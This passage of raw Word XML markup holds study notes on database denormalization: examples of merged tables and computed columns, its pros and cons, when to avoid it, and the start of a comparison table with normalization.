        <w:t>: In distributed systems or NoSQL databases (like MongoDB, Cassandra), denormalization is often used to optimize performance, as these systems may prioritize speed over consistency and integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B6FD9" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Examples of Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DED1E5" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Combining Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of having two separate tables for Orders and OrderDetails, you could merge them into one table to avoid needing a join.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026EDA0" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Normalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1076C5C8" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Orders Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains OrderID, CustomerID, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E350A" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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OrderDetails Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains OrderID, ProductID, Quantity, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595A0FD" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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enormalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384DFA61" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Orders Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains all fields like OrderID, CustomerID, ProductID, Quantity, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B275E" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Adding Computed Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A TotalAmount field can be added to an order table to store the computed sum of product prices and quantities, instead of calculating the total each time a query is run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F72099A" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Normalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E74B95" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Orders table: OrderID, CustomerID, TotalAmount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B8FE3" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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OrderDetails table: OrderID, ProductID, Price, Quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBBB80" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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enormalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4F4A3" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Orders table: OrderID, CustomerID, TotalAmount (where TotalAmount is precomputed and stored)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A1AEF" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Storing Foreign Key Data Directly</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In some cases, you might store the actual foreign key values (like names or descriptions) alongside the foreign keys for easy reference, instead of joining related tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A881745" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Normalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Store only ProductID in the Orders table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F180BF" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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enormalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Store both ProductID and ProductName in the Orders table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4C838" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Pros of Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE20C51" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Faster Read Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By reducing joins, you can speed up queries and make data retrieval more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF88EC" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Simpler Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can reduce the complexity of SQL queries, making them easier to write and execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B348533" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Reduced Computational Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces the need for real-time computations (like joining and aggregating data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6C999" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Cons of Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D0C4C8" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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ata Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since the same data may be stored in multiple places, the size of the database increases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C19EA19" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Update Anomalies</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Redundant data increases the risk of inconsistencies when data changes. For example, if you update an address in one place but forget to update it elsewhere, the data will be inconsistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193698D3" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Increased Storage Costs</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Storing redundant data increases the overall storage requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91A507" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Complex Writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write operations (insert, update, delete) can become more complex because changes must be made in multiple places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474D73C" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Consistency Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Keeping data in sync across all redundant copies can lead to consistency problems, especially in systems where transactions or ACID properties are required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171DC88" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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When to Avoid Denormalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68262F09" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Write-heavy Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If the application has a large number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations, denormalization can become a bottleneck since every update needs to be reflected across multiple tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7601C" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Real-time Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If consistency is crucial and the system requires real-time updates, denormalization can cause performance problems as the redundant data may not always stay up-to-date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EE4F8" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Small Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the database is small, the benefits of denormalization may be marginal, and normalization will likely be sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182CCEB" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00393B05" w:rsidRDefault="00A45898" w:rsidP="00A45898">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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC3082" w14:textId="77777777" w:rsidR="00A45898" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45898" w:rsidP="00A45898">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Denormalization is a trade-off between performance and maintainability. It is used primarily when </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more important than </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is common in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reporting systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data warehousing</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NoSQL databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. While it can reduce the complexity of queries and improve performance, it can lead to problems like </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>redundant data</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data inconsistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>increased storage requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Therefore, it should be used judiciously based on the application's needs and the nature of its data access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1806FF51" w14:textId="6893FFED" w:rsidR="0025066D" w:rsidRDefault="00000000" w:rsidP="0025066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F9BD701">
          <v:rect id="_x0000_i2980" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A8F51D" w14:textId="2376D45F" w:rsidR="00591CC9" w:rsidRPr="00CE4B95" w:rsidRDefault="00591CC9" w:rsidP="00591CC9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591CC9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Normalization and Denoramalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED8A2E1" w14:textId="76B62F20" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00E526EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>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5"/>
        <w:gridCol w:w="4490"/>
        <w:gridCol w:w="4559"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E5265B" w:rsidRPr="00E5265B" w14:paraId="223055FE" w14:textId="77777777" w:rsidTr="00E5265B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37ED8953" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00DA67E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EBA0B19" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00DA67E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E5265B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Normalization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32487EAC" w14:textId="77777777" w:rsidR="00E5265B" w:rsidRPr="00E5265B" w:rsidRDefault="00E5265B" w:rsidP="00DA67E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
